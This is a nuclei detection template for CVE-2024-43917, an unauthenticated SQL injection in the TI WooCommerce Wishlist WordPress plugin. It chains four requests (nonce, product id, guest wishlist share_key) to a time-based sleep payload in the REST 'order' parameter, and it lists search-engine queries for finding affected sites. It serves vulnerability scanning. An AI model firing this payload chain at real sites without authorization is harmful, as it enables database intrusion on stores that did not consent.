id: CVE-2024-43917

# Four-step nuclei check for CVE-2024-43917, an unauthenticated SQL injection in the
# TI WooCommerce Wishlist WordPress plugin (<= 2.8.2 per the description below).
# Step 1 collects the nonce the plugin embeds in a page, step 2 finds a product id on
# the category page, step 3 adds that product to a guest wishlist to learn its
# share_key, and step 4 issues the wishlist REST call with a time-based probe and
# matches on the response delay. All intermediate values are internal extractors, so
# only step 4 can produce a finding.

info:
  name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
  reference:
    - https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
    - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43917
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43917
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39641
    cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    # One request per flow step below.
    max-request: 4
    vendor: templateinvaders
    product: ti_woocommerce_wishlist
    framework: wordpress
    fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
    publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
  tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli

# Each step must succeed (its internal matcher/extractor must populate) before the
# next one runs.
flow: http(1) && http(2) && http(3) && http(4)

http:
  # Step 1: fetch a page and pull the nonce the plugin prints into the body; it is
  # sent later as X-WP-Nonce.
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"'

  # Step 2: locate a product id on the default category page. The internal word
  # matcher stops the flow early on sites without the plugin's markup.
  - raw:
      - |
        GET /product-category/uncategorized/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: product_id
        group: 1
        regex:
          - 'data-tinvwl_product_id="([0-9]+)"'

    matchers:
      - type: word
        part: body
        words:
          - 'data-tinvwl_product_id="'
        internal: true

  # Step 3: add the product to a (guest) wishlist via the plugin's AJAX form handler
  # and read the wishlist share_key from the JSON response.
  - raw:
      - |
        POST /product-category/uncategorized/ HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG

        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"

        []
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="tinv_wishlist_id"


        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="tinv_wishlist_name"


        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="product_type"

        simple
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="product_id"

        {{product_id}}
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="product_variation"

        0
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="product_action"

        addto
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
        Content-Disposition: form-data; name="redirect"

        {{RootURL}}/product-category/uncategorized/
        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG--

    extractors:
      - type: json
        part: body
        name: share_key
        internal: true
        json:
          - '.wishlist.share_key'

  # Step 4: time-based probe through the wishlist REST "order" parameter. The
  # matcher requires a delay of at least the probe's 6 seconds plus a JSON body
  # that still looks like a wishlist product listing; @timeout keeps the request
  # open long enough to observe the delay. Slow or overloaded hosts can still
  # produce false positives, so confirm findings manually before reporting.
  - raw:
      - |
        @timeout: 20s
        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "contains(content_type, 'application/json')"
          - "contains(body, 'product_id')"
        condition: and

# NOTE: the digest below is nuclei's template signature over the file content; any
# edit to this file (comments included) invalidates it until the template is
# re-signed.
# digest: 490a0046304402204b153ed7c5b3dc92d4d2c2a70297f27aa1e7dbca7536714d175bf3f47bc4563702204b51dadeb4ea6405c07478b5bcbe2f3845178386eefd2ab15ca1655afb1dc1d7:922c64590222798bb761d5b6d8e72950